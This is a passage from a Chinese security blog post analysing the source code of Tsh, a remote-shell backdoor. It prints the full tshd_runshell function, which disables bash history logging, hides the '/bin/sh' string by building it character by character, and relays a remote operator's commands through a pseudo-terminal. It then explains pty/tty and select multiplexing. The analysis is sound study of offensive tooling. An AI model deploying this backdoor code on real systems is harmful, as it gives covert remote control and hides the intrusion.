class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br><span class="line">135</span><br><span class="line">136</span><br><span class="line">137</span><br><span class="line">138</span><br><span class="line">139</span><br><span class="line">140</span><br><span class="line">141</span><br><span class="line">142</span><br><span class="line">143</span><br><span class="line">144</span><br><span class="line">145</span><br><span class="line">146</span><br><span class="line">147</span><br><span class="line">148</span><br><span class="line">149</span><br><span class="line">150</span><br><span class="line">151</span><br><span class="line">152</span><br><span class="line">153</span><br><span class="line">154</span><br><span class="line">155</span><br><span class="line">156</span><br><span class="line">157</span><br><span class="line">158</span><br><span class="line">159</span><br><span class="line">160</span><br><span class="line">161</span><br><span class="line">162</span><br><span class="line">163</span><br><span class="line">164</span><br><span class="line">165</span><br><span class="line">166</span><br><span class="line">167</span><br><span class="line">168</span><br><span class="line">169</span><br><span class="line">170</span><br><span class="line">171</span><br><span class="line">172</span><br><span class="line">173</span><br><span class="line">174</span><br><span class="line">175</span><br><span class="line">176</span><br><span class="line">177</span><br><span class="line">178</span><br><span class="line">179</span><br><span class="line">180</span><br><span class="line">181</span><br><span class="line">182</span><br><span class="line">183</span><br><span class="line">184</span><br><span class="line">185</span><br><span class="line">186</span><br><span class="line">187</span><br><span class="line">188</span><br><span class="line">189</span><br><span class="line">190</span><br><span class="line">191</span><br><span class="line">192</span><br><span class="line">193</span><br><span class="line">194</span><br><span class="line">195</span><br><span class="line">196</span><br><span class="line">197</span><br><span class="line">198</span><br><span class="line">199</span><br><span class="line">200</span><br><span class="line">201</span><br><span class="line">202</span><br><span class="line">203</span><br><span class="line">204</span><br><span class="line">205</span><br><span class="line">206</span><br><span class="line">207</span><br><span class="line">208</span><br><span class="line">209</span><br><span class="line">210</span><br><span class="line">211</span><br><span class="line">212</span><br><span class="line">213</span><br><span class="line">214</span><br><span class="line">215</span><br><span class="line">216</span><br><span class="line">217</span><br><span class="line">218</span><br><span class="line">219</span><br><span class="line">220</span><br><span class="line">221</span><br><span class="line">222</span><br><span class="line">223</span><br><span class="line">224</span><br><span class="line">225</span><br><span class="line">226</span><br><span class="line">227</span><br><span class="line">228</span><br><span class="line">229</span><br><span class="line">230</span><br><span class="line">231</span><br><span class="line">232</span><br><span class="line">233</span><br><span class="line">234</span><br><span class="line">235</span><br><span class="line">236</span><br><span class="line">237</span><br><span class="line">238</span><br><span class="line">239</span><br><span class="line">240</span><br><span class="line">241</span><br><span class="line">242</span><br><span class="line">243</span><br><span class="line">244</span><br><span class="line">245</span><br><span class="line">246</span><br><span class="line">247</span><br><span class="line">248</span><br><span class="line">249</span><br><span class="line">250</span><br><span class="line">251</span><br><span class="line">252</span><br><span class="line">253</span><br><span class="line">254</span><br><span class="line">255</span><br><span class="line">256</span><br><span class="line">257</span><br><span class="line">258</span><br><span class="line">259</span><br><span class="line">260</span><br><span class="line">261</span><br><span class="line">262</span><br><span class="line">263</span><br><span class="line">264</span><br><span class="line">265</span><br><span class="line">266</span><br><span class="line">267</span><br><span class="line">268</span><br><span class="line">269</span><br><span class="line">270</span><br><span class="line">271</span><br><span class="line">272</span><br><span class="line">273</span><br><span class="line">274</span><br><span class="line">275</span><br><span class="line">276</span><br><span class="line">277</span><br><span class="line">278</span><br><span class="line">279</span><br><span class="line">280</span><br><span class="line">281</span><br><span class="line">282</span><br><span class="line">283</span><br><span class="line">284</span><br><span class="line">285</span><br><span class="line">286</span><br><span class="line">287</span><br><span class="line">288</span><br><span class="line">289</span><br><span class="line">290</span><br><span class="line">291</span><br><span class="line">292</span><br><span class="line">293</span><br><span class="line">294</span><br><span class="line">295</span><br><span class="line">296</span><br><span class="line">297</span><br><span class="line">298</span><br><span class="line">299</span><br><span class="line">300</span><br><span class="line">301</span><br><span class="line">302</span><br><span class="line">303</span><br><span class="line">304</span><br><span class="line">305</span><br><span class="line">306</span><br><span class="line">307</span><br><span class="line">308</span><br><span class="line">309</span><br><span class="line">310</span><br><span class="line">311</span><br><span class="line">312</span><br><span class="line">313</span><br><span class="line">314</span><br><span class="line">315</span><br><span class="line">316</span><br><span class="line">317</span><br><span class="line">318</span><br><span class="line">319</span><br><span class="line">320</span><br><span class="line">321</span><br><span class="line">322</span><br><span class="line">323</span><br><span class="line">324</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">tshd_runshell</span><span class="hljs-params">( <span class="hljs-keyword">int</span> client )</span><br></span>&#123;<br>    fd_set rd;<br>    <span class="hljs-class"><span class="hljs-keyword">struct</span> <span class="hljs-title">winsize</span> <span class="hljs-title">ws</span>;</span><br>    <span class="hljs-keyword">char</span> *slave, *temp, *shell;<br>    <span class="hljs-keyword">int</span> ret, len, pid, pty, tty, n;<br><br>    <span class="hljs-comment">// 获取一个伪终端 pseudo-tty</span><br>	<span class="hljs-comment">// 这里用宏在编译的时候做了跨平台的处理，实现功能相同，我们当前暂时关心Linux部分</span><br>    <br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> defined LINUX || defined FREEBSD || defined OPENBSD || defined OSF</span><br><br>    <span class="hljs-comment">// 自动获取一个伪终端，在/dev/pts下最大值 + 1</span><br>    <span class="hljs-keyword">if</span>( openpty( &amp;pty, &amp;tty, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span> ) &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">24</span> );<br>    &#125;<br><br>    <span class="hljs-comment">// 获取当前伪终端的完整路径</span><br>    slave = ttyname( tty );<br><br>    <span class="hljs-keyword">if</span>( slave == <span class="hljs-literal">NULL</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">25</span> );<br>    &#125;<br><br><span class="hljs-meta">#<span class="hljs-meta-keyword">else</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> defined IRIX</span><br><br>    slave = _getpty( &amp;pty, O_RDWR, <span class="hljs-number">0622</span>, <span class="hljs-number">0</span> );<br><br>    <span class="hljs-keyword">if</span>( slave == <span class="hljs-literal">NULL</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">26</span> );<br>    &#125;<br><br>    tty = <span class="hljs-built_in">open</span>( slave, O_RDWR | O_NOCTTY );<br><br>    <span class="hljs-keyword">if</span>( tty &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">27</span> );<br>    &#125;<br><br><span class="hljs-meta">#<span class="hljs-meta-keyword">else</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> defined CYGWIN || defined SUNOS || defined HPUX</span><br><br>    pty = <span class="hljs-built_in">open</span>( <span class="hljs-string">"/dev/ptmx"</span>, O_RDWR | O_NOCTTY );<br><br>    <span class="hljs-keyword">if</span>( pty &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">28</span> );<br>    &#125;<br><br>    <span class="hljs-keyword">if</span>( grantpt( pty ) &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">29</span> );<br>    &#125;<br><br>    <span class="hljs-keyword">if</span>( unlockpt( pty ) &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">30</span> );<br>    &#125;<br><br>    slave = ptsname( pty );<br><br>    <span class="hljs-keyword">if</span>( slave == <span class="hljs-literal">NULL</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">31</span> );<br>    &#125;<br><br>    tty = <span class="hljs-built_in">open</span>( slave, O_RDWR | O_NOCTTY );<br><br>    <span class="hljs-keyword">if</span>( tty &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">32</span> );<br>    &#125;<br><br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> defined SUNOS || defined HPUX</span><br><br>    <span class="hljs-keyword">if</span>( ioctl( tty, I_PUSH, <span class="hljs-string">"ptem"</span> ) &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">33</span> );<br>    &#125;<br><br>    <span class="hljs-keyword">if</span>( ioctl( tty, I_PUSH, <span class="hljs-string">"ldterm"</span> ) &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">34</span> );<br>    &#125;<br><br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> defined SUNOS</span><br><br>    <span class="hljs-keyword">if</span>( ioctl( tty, I_PUSH, <span class="hljs-string">"ttcompat"</span> ) &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">35</span> );<br>    &#125;<br><br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br><br>    <span class="hljs-comment">/* just in case bash is run, kill the history file */</span><br><br>    temp = (<span class="hljs-keyword">char</span> *) <span class="hljs-built_in">malloc</span>( <span class="hljs-number">10</span> );<br><br>    <span class="hljs-keyword">if</span>( temp == <span class="hljs-literal">NULL</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">36</span> );<br>    &#125;<br><br>    temp[<span class="hljs-number">0</span>] = <span class="hljs-string">'H'</span>; temp[<span class="hljs-number">5</span>] = <span class="hljs-string">'I'</span>;<br>    temp[<span class="hljs-number">1</span>] = <span class="hljs-string">'I'</span>; temp[<span class="hljs-number">6</span>] = <span class="hljs-string">'L'</span>;<br>    temp[<span class="hljs-number">2</span>] = <span class="hljs-string">'S'</span>; temp[<span class="hljs-number">7</span>] = <span class="hljs-string">'E'</span>;<br>    temp[<span class="hljs-number">3</span>] = <span class="hljs-string">'T'</span>; temp[<span class="hljs-number">8</span>] = <span class="hljs-string">'='</span>;<br>    temp[<span class="hljs-number">4</span>] = <span class="hljs-string">'F'</span>; temp[<span class="hljs-number">9</span>] = <span class="hljs-string">'\0'</span>;<br><br>    <span class="hljs-comment">// 将环境变量HISTFILE置空，让/root/.bash_history不记录我们的shell操作</span><br>    putenv( temp );<br><br>    <span class="hljs-comment">// 获取client端的Term环境变量</span><br>    ret = pel_recv_msg( client, message, &amp;len );<br>    <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">37</span> );<br>    &#125;<br>    message[len] = <span class="hljs-string">'\0'</span>;<br><br>    temp = (<span class="hljs-keyword">char</span> *) <span class="hljs-built_in">malloc</span>( len + <span class="hljs-number">6</span> );<br>    <span class="hljs-keyword">if</span>( temp == <span class="hljs-literal">NULL</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">38</span> );<br>    &#125;<br><br>    temp[<span class="hljs-number">0</span>] = <span class="hljs-string">'T'</span>; temp[<span class="hljs-number">3</span>] = <span class="hljs-string">'M'</span>;<br>    temp[<span class="hljs-number">1</span>] = <span class="hljs-string">'E'</span>; temp[<span class="hljs-number">4</span>] = <span class="hljs-string">'='</span>;<br>    temp[<span class="hljs-number">2</span>] = <span class="hljs-string">'R'</span>;<br><br>    <span class="hljs-built_in">strncpy</span>( temp + <span class="hljs-number">5</span>, (<span class="hljs-keyword">char</span> *) message, len + <span class="hljs-number">1</span> );<br><br>    putenv( temp );<br><br>    <span class="hljs-comment">/* 获取terminal的row和col大小 */</span><br>    ret = pel_recv_msg( client, message, &amp;len );<br>    <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS || len != <span class="hljs-number">4</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">39</span> );<br>    &#125;<br><br>    ws.ws_row = ( (<span class="hljs-keyword">int</span>) message[<span class="hljs-number">0</span>] &lt;&lt; <span class="hljs-number">8</span> ) + (<span class="hljs-keyword">int</span>) message[<span class="hljs-number">1</span>];<br>    ws.ws_col = ( (<span class="hljs-keyword">int</span>) message[<span class="hljs-number">2</span>] &lt;&lt; <span class="hljs-number">8</span> ) + (<span class="hljs-keyword">int</span>) message[<span class="hljs-number">3</span>];<br><br>    ws.ws_xpixel = <span class="hljs-number">0</span>;<br>    ws.ws_ypixel = <span class="hljs-number">0</span>;<br>    <br>    <span class="hljs-comment">// 设置当前伪终端的宽高</span><br>    <span class="hljs-keyword">if</span>( ioctl( pty, TIOCSWINSZ, &amp;ws ) &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">40</span> );<br>    &#125;<br><br>    <span class="hljs-comment">// 获取client传输的命令</span><br>    ret = pel_recv_msg( client, message, &amp;len );<br>    <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">41</span> );<br>    &#125;<br>    message[len] = <span class="hljs-string">'\0'</span>;<br><br>    temp = (<span class="hljs-keyword">char</span> *) <span class="hljs-built_in">malloc</span>( len + <span class="hljs-number">1</span> );<br>    <span class="hljs-keyword">if</span>( temp == <span class="hljs-literal">NULL</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">42</span> );<br>    &#125;<br><br>    <span class="hljs-built_in">strncpy</span>( temp, (<span class="hljs-keyword">char</span> *) message, len + <span class="hljs-number">1</span> );<br><br>    <span class="hljs-comment">// fork，使用子进程后台运行shell</span><br>    pid = fork();<br><br>    <span class="hljs-keyword">if</span>( pid &lt; <span class="hljs-number">0</span> )<br>    &#123;<br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">43</span> );<br>    &#125;<br><br>    <span class="hljs-comment">// 子进程用来作为shell</span><br>    <span class="hljs-keyword">if</span>( pid == <span class="hljs-number">0</span> )<br>    &#123;<br>		<span class="hljs-comment">// fork会复制进程内的公有变量，子进程主要是作为后台shell执行命令并返回值给父进程，父进程用来管理pty和client通信，所以这里不需要client和pty</span><br>        <span class="hljs-built_in">close</span>( client );<br>        <span class="hljs-built_in">close</span>( pty );<br><br>		<span class="hljs-comment">// 创建session，新建进程组，防止terminal退出导致进程的死亡</span><br>        <span class="hljs-keyword">if</span>( setsid() &lt; <span class="hljs-number">0</span> )<br>        &#123;<br>            <span class="hljs-keyword">return</span>( <span class="hljs-number">44</span> );<br>        &#125;<br><br>        <span class="hljs-comment">/* set controlling tty, to have job control */</span><br><br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> defined LINUX || defined FREEBSD || defined OPENBSD || defined OSF</span><br>		<span class="hljs-comment">// 读取指定终端设备进程的组id</span><br>        <span class="hljs-keyword">if</span>( ioctl( tty, TIOCSCTTY, <span class="hljs-literal">NULL</span> ) &lt; <span class="hljs-number">0</span> )<br>        &#123;<br>            <span class="hljs-keyword">return</span>( <span class="hljs-number">45</span> );<br>        &#125;<br><br><span class="hljs-meta">#<span class="hljs-meta-keyword">else</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">if</span> defined CYGWIN || defined SUNOS || defined IRIX || defined HPUX</span><br><br>        &#123;<br>            <span class="hljs-keyword">int</span> fd;<br><br>            fd = <span class="hljs-built_in">open</span>( slave, O_RDWR );<br><br>            <span class="hljs-keyword">if</span>( fd &lt; <span class="hljs-number">0</span> )<br>            &#123;<br>                <span class="hljs-keyword">return</span>( <span class="hljs-number">46</span> );<br>            &#125;<br><br>            <span class="hljs-built_in">close</span>( tty );<br><br>            tty = fd;<br>        &#125;<br><br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br><span class="hljs-meta">#<span class="hljs-meta-keyword">endif</span></span><br><br>        <span class="hljs-comment">// 将标准输入、输出、错误输出复制到tty中</span><br>        dup2( tty, <span class="hljs-number">0</span> );<br>        dup2( tty, <span class="hljs-number">1</span> );<br>        dup2( tty, <span class="hljs-number">2</span> );<br><br>        <span class="hljs-keyword">if</span>( tty &gt; <span class="hljs-number">2</span> )<br>        &#123;<br>            <span class="hljs-built_in">close</span>( tty );<br>        &#125;<br><br>        <span class="hljs-comment">// 命令字符串开辟空间</span><br>        shell = (<span class="hljs-keyword">char</span> *) <span class="hljs-built_in">malloc</span>( <span class="hljs-number">8</span> );<br>        <span class="hljs-keyword">if</span>( shell == <span class="hljs-literal">NULL</span> )<br>        &#123;<br>            <span class="hljs-keyword">return</span>( <span class="hljs-number">47</span> );<br>        &#125;<br>		<br>        <span class="hljs-comment">// "/bin/sh"</span><br>        shell[<span class="hljs-number">0</span>] = <span class="hljs-string">'/'</span>; shell[<span class="hljs-number">4</span>] = <span class="hljs-string">'/'</span>;<br>        shell[<span class="hljs-number">1</span>] = <span class="hljs-string">'b'</span>; shell[<span class="hljs-number">5</span>] = <span class="hljs-string">'s'</span>;<br>        shell[<span class="hljs-number">2</span>] = <span class="hljs-string">'i'</span>; shell[<span class="hljs-number">6</span>] = <span class="hljs-string">'h'</span>;<br>        shell[<span class="hljs-number">3</span>] = <span class="hljs-string">'n'</span>; shell[<span class="hljs-number">7</span>] = <span class="hljs-string">'\0'</span>;<br><br>        <span class="hljs-comment">// 当前子进程装载为/bin/sh shell</span><br>        execl( shell, shell + <span class="hljs-number">5</span>, <span class="hljs-string">"-c"</span>, temp, (<span class="hljs-keyword">char</span> *) <span class="hljs-number">0</span> );<br><br>        <span class="hljs-comment">/* d0h, this shouldn't happen */</span><br><br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">48</span> );<br>    &#125;<br>    <span class="hljs-keyword">else</span> <span class="hljs-comment">// 父进程，接收消息给后台sh作为转发</span><br>    &#123;<br>        <span class="hljs-comment">/* tty (slave side) not needed anymore */</span><br><br>        <span class="hljs-built_in">close</span>( tty );<br><br>        <span class="hljs-comment">// select多路复用模型 收发数据</span><br>        <span class="hljs-keyword">while</span>( <span class="hljs-number">1</span> )<br>        &#123;<br>            FD_ZERO( &amp;rd );<br>            FD_SET( client, &amp;rd );<br>            FD_SET( pty, &amp;rd );<br><br>            n = ( pty &gt; client ) ? pty : client;<br><br>            <span class="hljs-keyword">if</span>( select( n + <span class="hljs-number">1</span>, &amp;rd, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span>, <span class="hljs-literal">NULL</span> ) &lt; <span class="hljs-number">0</span> )<br>            &#123;<br>                <span class="hljs-keyword">return</span>( <span class="hljs-number">49</span> );<br>            &#125;<br><br>			<span class="hljs-comment">// 父进程接收来自client消息</span><br>            <span class="hljs-keyword">if</span>( FD_ISSET( client, &amp;rd ) )<br>            &#123;<br>                ret = pel_recv_msg( client, message, &amp;len );<br><br>                <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>                &#123;<br>                    <span class="hljs-keyword">return</span>( <span class="hljs-number">50</span> );<br>                &#125;<br><br>				<span class="hljs-comment">// 直接把收到的消息写给pty</span><br>                <span class="hljs-keyword">if</span>( <span class="hljs-built_in">write</span>( pty, message, len ) != len )<br>                &#123;<br>                    <span class="hljs-keyword">return</span>( <span class="hljs-number">51</span> );<br>                &#125;<br>            &#125;<br><br>			<span class="hljs-comment">// sh有消息写给父进程，那么父进程直接把消息发送给client</span><br>            <span class="hljs-keyword">if</span>( FD_ISSET( pty, &amp;rd ) )<br>            &#123;<br>                <span class="hljs-comment">// 从pty拿到后台tty执行命令后的返回值</span><br>                len = <span class="hljs-built_in">read</span>( pty, message, BUFSIZE );<br><br>                <span class="hljs-keyword">if</span>( len == <span class="hljs-number">0</span> ) <span class="hljs-keyword">break</span>;<br><br>                <span class="hljs-keyword">if</span>( len &lt; <span class="hljs-number">0</span> )<br>                &#123;<br>                    <span class="hljs-keyword">return</span>( <span class="hljs-number">52</span> );<br>                &#125;<br>				<br>                <span class="hljs-comment">// 发送给client</span><br>                ret = pel_send_msg( client, message, len );<br>                <span class="hljs-keyword">if</span>( ret != PEL_SUCCESS )<br>                &#123;<br>                    <span class="hljs-keyword">return</span>( <span class="hljs-number">53</span> );<br>                &#125;<br>            &#125;<br>        &#125;<br><br>        <span class="hljs-keyword">return</span>( <span class="hljs-number">54</span> );<br>    &#125;<br><br>    <span class="hljs-comment">/* not reached */</span><br><br>    <span class="hljs-keyword">return</span>( <span class="hljs-number">55</span> );<br>&#125;<br></code></pre></td></tr></table></figure>



<h2 id="0x03-技术分析"><a href="#0x03-技术分析" class="headerlink" title="0x03 技术分析"></a>0x03 技术分析</h2><h3 id="0x31-pty-与-tty-数据传导"><a href="#0x31-pty-与-tty-数据传导" class="headerlink" title="0x31 pty 与 tty 数据传导"></a>0x31 <strong>pty</strong> 与 <strong>tty</strong> 数据传导</h3><ul>
<li><p>二者为主从关系，pty (master)，tty (slave)</p>
</li>
<li><p>伪终端的出现是因为一些面向终端应用的输入（或输出）不再直接来自（或去往）实际终端</p>
</li>
<li><p>伪终端是<strong>一对</strong>虚拟的字符设备，linux内核使用一种符合tty线规程（line discipline）的<strong>双向管道</strong>连接伪终端的主从设备</p>
</li>
<li><p>主设备上的任何写入操作都会反映到从设备上，反之亦然，从设备上的应用进程可以像使用传统终端一样读取来自主设备上应用程序的输入，以及向主设备应用输出信息</p>
</li>
<li><p>伪终端从设备应用通常是主设备应用的子进程，主应用打开一对伪终端并fork一个子进程，然后子进程打开并使用从设备，伪终端应用的实现模型可用下图表示</p>
</li>
</ul>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/1637679849154.png" srcset="/img/loading.gif" lazyload alt="pty_tty_model"></p>
<h3 id="0x32-select-IO多路复用模型"><a href="#0x32-select-IO多路复用模型" class="headerlink" title="0x32 select IO多路复用模型"></a>0x32 select IO多路复用模型</h3><ul>
<li>select多路复用模型是Linux中三种多路复用模型之一<ul>
<li>主要采取<strong>轮询</strong>文件标识符集合的模式，来达到高效率io目的</li>
<li>主要适用于少量且活性高的标识符</li>
<li>select可以设置读、写、异常集合</li>
</ul>
</li>
<li>这里使用的目的：使用单线程来完成多个并发连接请求<ul>
<li>其实也能够用多线程来处理，即每次来一个连接请求，我们就开启一个线程去处理后续逻辑</li>
</ul>
</li>
<li>tsh的做法：一开始清空集合，然后将需要的文件标识符放入读集合中，再调用select同时设置最大文件标识符，这样select会在0~Max之间遍历所有标识符</li>
</ul>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/1637593938526.png" srcset="/img/loading.gif" lazyload alt="fd_set"></p>
<ul>
<li>当读集合中某个fd存在事件，那么select系统调用将会返回</li>
</ul>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/1637593922165.png" srcset="/img/loading.gif" lazyload alt="select_action"></p>
<ul>
<li>然后使用FD_ISSET，判断事件集合中本次存在事件的标识符具体是哪一个，处理其后续逻辑</li>
</ul>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/1637594856912.png" srcset="/img/loading.gif" lazyload alt="select_process"></p>
<h2 id="0x0-总结"><a href="#0x0-总结" class="headerlink" title="0x0 总结"></a>0x0 总结</h2><ol>
<li><p>Everything is file</p>
</li>
<li><p>宏的使用，做到跨平台，Linux系统编程基本操作</p>
</li>
<li><p>使用孙进程，避免出现僵尸进程</p>
</li>
<li><p>tty和pty的使用做到了真正的交互shell</p>
<ol>
<li>这里说一下python shell，其连接后使用<code>pty.spawn(&quot;/bin/bash&quot;)</code>交互shell其实依然为某种程度哑shell，无法完成某些高交互进程(如：vim)的使用，需要<a href="https://saucer-man.com/information_security/233.html" target="_blank" rel="noopener">进一步升级</a></li>
</ol>
<p><img src="/2021/11/23/Tsh%E6%BA%90%E7%A0%81%E9%98%85%E8%AF%BB%E5%92%8C%E5%88%86%E6%9E%90/1637595531478.png" srcset="/img/loading.gif" lazyload alt="python_dumb_shell"></p>
</li>
<li><p>设置窗口大小，控制返回值窗口</p>
</li>
<li><p>存在bug，输入<code>./tshd asdf</code>后台会一直创建进程，最终跑死机器</p>
</li>
</ol>
<h2 id="0x0-参考资料"><a href="#0x0-参考资料" class="headerlink" title="0x0 参考资料"></a>0x0 参考资料</h2><p><a href="https://man7.org/linux/man-pages/man3/termios.3.html" target="_blank" rel="noopener">[1] termios</a></p>
<p><a href="https://unix.stackexchange.com/questions/43945/whats-the-difference-between-various-term-variables" target="_blank" rel="noopener">[2] What’s the difference between various $TERM variables?</a></p>
<p><a href="http://www.freeoa.net/osuport/intronix/linux-tty-ptys-console_3316.html" target="_blank" rel="noopener">[3] 理解 Linux 中的 tty、pty、pts、console、terminal</a></p>
<p><a href="https://askubuntu.com/questions/444880/why-do-i-need-to-run-bin-bash-login" target="_blank" rel="noopener">[4] Why do I need to run “/bin/bash –login”</a></p>
<p><a href="https://www.jb51.net/article/136931.htm" target="_blank" rel="noopener">[5] Linux基础之终端、控制台、tty、pty简介说明</a></p>
<p><a href="https://www.cnblogs.com/dux2016/articles/6236131.html" target="_blank" rel="noopener">[] Linux终端简介与pty编程</a></p>
<p><a href="https://juejin.cn/post/6882984260672847879" target="_blank" rel="noopener">[6] 彻底理解 IO 多路复用实现机制</a></p>
<p><a href="https://xz.aliyun.com/t/7338" target="_blank" rel="noopener">[7] Linux下的权限维持</a></p>
<p><a href="https://jacktang816.github.io/post/tinyhttpdread/" target="_blank" rel="noopener">[8] tinyhttpd 阅读与分析</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/Sec-Dev/">Sec Dev</a>
                    
                      <a class="hover-with-bg" href="/categories/Red-Team/">Red Team</a>
                    
                      <a class="hover-with-bg" href="/categories/C2/">C2</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E5%AE%89%E5%85%A8%E5%B7%A5%E5%85%B7%E6%9C%88%E6%9C%88%E8%AF%BB/">安全工具月月读</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" target="_blank" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/08/14/Arm%E5%B9%B3%E5%8F%B0Nmap7-8%E4%BA%A4%E5%8F%89%E7%BC%96%E8%AF%91/">
                        <span class="hidden-mobile">Arm平台Nmap7.8交叉编译</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
